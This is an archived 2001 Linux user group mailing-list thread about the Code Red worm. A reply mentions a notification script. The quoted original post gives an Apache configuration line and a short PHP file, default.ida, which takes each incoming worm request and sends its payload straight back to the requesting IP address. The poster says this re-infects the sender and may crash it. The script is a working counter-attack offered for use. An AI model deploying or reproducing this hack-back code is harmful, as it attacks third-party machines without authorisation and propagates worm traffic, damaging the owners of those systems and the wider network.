[olug] Code red

Jeremy Bettis jeremyb at hksys.com
Wed Aug 15 17:58:28 UTC 2001


I installed this perl script on my site:

http://www.dasbistro.com/default.ida

It emails the server administrator, and let's them know they are infected.

----- Original Message ----- 
From: "Brian Roberson" <brian at bstc.net>
To: <olug at bstc.net>
Sent: Tuesday, August 14, 2001 6:16 PM
Subject: [olug] Code red


> I've been asked multiple times what I am doing about the code red worm (
> and it predecessor ), so here is my story....
> 
> 
> 
> Update your httpd.conf to include the extension .ida as a php file ( you
> have php installed right? ;-)
> 
> E.g. 
> #########
> AddType application/x-httpd-php .php .php3 .ida
> #########
> 
> 
> 
> And create this nifty little file, named default.ida in the root of your
> web server directory:
> 
> ##########################################
> <?
> $junk = getenv("QUERY_STRING");
> $infected = getenv("REMOTE_ADDR");
> $fp = fsockopen("$infected",80);
> fputs($fp, "GET /default.ida?$junk\r\n");
> fclose($fp);
> ?>
> ##########################################
> 
> 
> Apparently you can infect a box multiple times, and eventually it will
> crash itself ;-)
> 
> 
> 
> 
> 
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: olug-unsubscribe at bstc.net
> For additional commands, e-mail: olug-help at bstc.net
> 
> 


---------------------------------------------------------------------
To unsubscribe, e-mail: olug-unsubscribe at bstc.net
For additional commands, e-mail: olug-help at bstc.net



More information about the OLUG mailing list